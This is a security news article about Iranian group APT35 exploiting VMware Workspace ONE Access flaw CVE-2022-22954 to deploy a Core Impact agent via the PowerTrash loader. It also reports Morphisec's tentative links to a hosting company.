Advanced hackers are actively exploiting a critical remote code execution (RCE) vulnerability, CVE-2022-22954, affecting VMware Workspace ONE Access (formerly called VMware Identity Manager).
The issue was fixed in a security update 20 days ago along with two more RCEs: CVE-2022-22957 and CVE-2022-22958 also affecting VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation and vRealize Suite Lifecycle Manager.
Shortly after the public disclosure of the flaws, proof-of-concept (PoC) exploit code emerged in the public domain, allowing hackers to take advantage of vulnerable implementations of VMware products. VMware confirmed the exploitation of CVE-2022-22954 in the wild.
Now, Morphisec researchers report seeing exploitation by advanced persistent threat (APT) actors, in particular an Iranian hacking group tracked as APT35, also known as “Rocket Kitten.”
Adversaries gain initial access to the environment by exploiting CVE-2022-22954, the only one in the trio of RCEs that does not require administrative access to the target server and also has a publicly available PoC exploit.
The attack begins by running a PowerShell command on the vulnerable service (Identity Manager), which starts a stage.
The host then fetches the PowerTrash loader from the command and control (C2) server in a highly obfuscated form and loads a Core Impact agent into system memory.
Core Impact is a legitimate penetration testing tool that is abused for nefarious purposes in this case, similar to how Cobalt Strike is implemented in malicious campaigns.
However, this is not a new item. Trend Micro has reported abuse of Core Impact in the past by APT35, the activity dating back to 2015.
Morphisec CTO Michael Gorelik told BleepingComputer that the attacker attempted a lateral move on the network, although the backdoor was stopped.
“With privileged access, these types of attacks can bypass typical defenses, including antivirus (AV) and endpoint detection and response (EDR),” Morphisec adds in the report.
Links to hosting company
Morphisec was able to retrieve the C2 address of the stage server, the version of the Core Impact client, and the 256-bit encryption key used for C2 communication, ultimately linking the operation to a specific person named Ivan Neculiti.
There’s an entry in the ‘Hucksters’ fraud exposure database by that name, which lists corporate entities registered in Moldova, Russia, and the UK, including a hosting company that the database says supports all sorts of of illegal websites, as well as spam and phishing campaigns
It is unclear whether Neculiti or associated companies were in any way involved, knowingly or unknowingly, in cybercriminal campaigns.
BleepingComputer has contacted both hosting companies for comment on the allegations made in the Morphisec report, and we’ll update this post if we hear back.